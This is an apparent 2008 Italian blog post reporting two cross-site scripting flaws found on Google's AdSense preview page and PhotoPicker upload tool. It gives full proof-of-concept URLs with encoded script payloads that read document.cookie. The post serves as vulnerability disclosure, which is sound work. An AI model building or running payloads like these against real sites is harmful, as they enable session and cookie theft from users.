Due nuove vulnerabilita’ per Google

Apr 11, 2008 | Category: Google Vulns

Entrambe scoperte ieri sono le vulnerabilita” xss scoperte sul sito di Google.

I siti interessati sono quello di adsense e dell”utility di PhotoPicker che permette l”upload di immagini.Author: Hikapa
Mirror: http://www.xssed.com/mirror/36391/


https://www.google.com/adsense/preview?snippet=%3Cscript%20type%3D%22text%2F
javascript%22%3Ealert(document.cookie);%20%3C%2Fscript%3E

Author: mox
Mirror: http://www.xssed.com/mirror/35547/


http://www.google.com/s2/ui/photopicker.PhotoPicker?done=
%22%3E&js=RAW&pop=TRUE&dn=%22%3E&profileMode=1&userId=%22
%3Exss&urlEnabled=1&extraUploadParams=out%3D%22%3E%3CIMG%
20%22%22%22%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIP
T%3E%22%3E&suppressHide=1
Bookmark and Share
Permalink Comments (0) Apr 11, 2008

Comments are closed.